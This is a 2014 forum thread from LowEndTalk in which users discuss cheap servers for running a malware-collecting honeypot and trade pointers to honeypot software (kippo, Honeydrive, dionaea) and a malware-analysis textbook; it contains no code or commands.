Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Good place to run a honeypot?
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Good place to run a honeypot?

Id like a to run a honeypot primarily for malware collection. Id need a server powerful enough to run Xubuntu in a VM (which itself will not be headless). If I could install the xubuntu iso on the server directly that would be even better. Im just getting into the area so I dont plan to spend much money on it.

Comments

  • Kimsufi?

  • Out or curiosity, I've always wanted to do some malware analysis and collection. What tools do you use and what do you need to learn?

    /offtopic

  • Vultr allows custom ISOs

  • gestiondbigestiondbi Member, Patron Provider

    @hostnoob said:
    Vultr allows custom ISOs

    Yes, but not sure they allow malware on their nodes...

  • rds100rds100 Member
    edited October 2014

    davidgestiondbi said: Yes, but not sure they allow malware on their nodes...

    Malware detection is not malware ;-)
    For instance there is a fake ssh daemon, when some brute forcer connects to it, it pretends he can login and then starts logging the commands he tries to execute.

    Thanked by 1aglodek
  • Please do share your findings/statistics with LET if you succeed.

  • @honeyme Is it a custom ISO you've created or a distro you've downloaded from somewhere? It's an interesting idea.

  • BrianHarrisonBrianHarrison Member, Patron Provider

    Sounds like you'd be better served with a dedicated server -- attracting malware on a VM node won't make your host happy :-)

    Thanked by 1gestiondbi
  • @BrianHarrison said: Sounds like you'd be better served with a dedicated server -- attracting malware on a VM node won't make your host happy :-)

    Honeypot is not attracting anything, rather reading hacker automated scripts attempt to execute commands in a fake, controlled environment where they can't do any damage.

    @krs360 said: Is it a custom ISO you've created or a distro you've downloaded from somewhere? It's an interesting idea.

    @honeyme: I agree. Where to get this?

  • @aglodek I have one of those 1.99 euro kimsufi boxes which is doing nothing at the moment, it was used as a mail server but that's going through Google Apps nowadays.

    Thought a little honeypot would be an interesting project.

  • aglodekaglodek Member
    edited October 2014

    @krs360 said: aglodek I have one of those 1.99 euro kimsufi boxes which is doing nothing at the moment, it was used as a mail server but that's going through Google Apps nowadays.
    Thought a little honeypot would be an interesting project.

    Thanks, but I meant where to get the software, like the fake ssh app etc... I'd like to check this out myself, too.

  • krs360krs360 Member
    edited October 2014

    @aglodek That's what I was getting at, would be good if there was a custom iso, etc. If you do find anything of interest - let me know..

  • Google kippo for the fake ssh. There's a fork (on Github I think) which can handle sftp as well.
    Though it's not THAT interesting because all you will see is Chinese bots trying to upload all sorts of trojans all day long!

    Thanked by 2aglodek Mark_R
  • honeymehoneyme Member
    edited October 2014

    Hey Guys, sorry for the delayed reply.

    @0xdragon said:
    Out or curiosity, I've always wanted to do some malware analysis and collection. What tools do you use and what do you need to learn?

    /offtopic

    Practical Malware Analysis is a really wonderful introduction to malware analysis. It comes with many samples and guides you through dissecting them using a range of freely available tools.
    http://www.amazon.com/Practical-Malware-Analysis-Dissecting-Malicious/dp/1593272901

    @krs360 said:
    honeyme Is it a custom ISO you've created or a distro you've downloaded from somewhere? It's an interesting idea.

    Im specifically looking at Honeydrive, a custom linux distro that comes with many honeypots.
    http://bruteforce.gr/honeydrive

    There are different kinds of honeypots, i think id really just be interested in running dionaea - it emulates a host of services sufficient to be able to grab the malware from incoming attacks.
    http://dionaea.carnivore.it/

Sign In or Register to comment.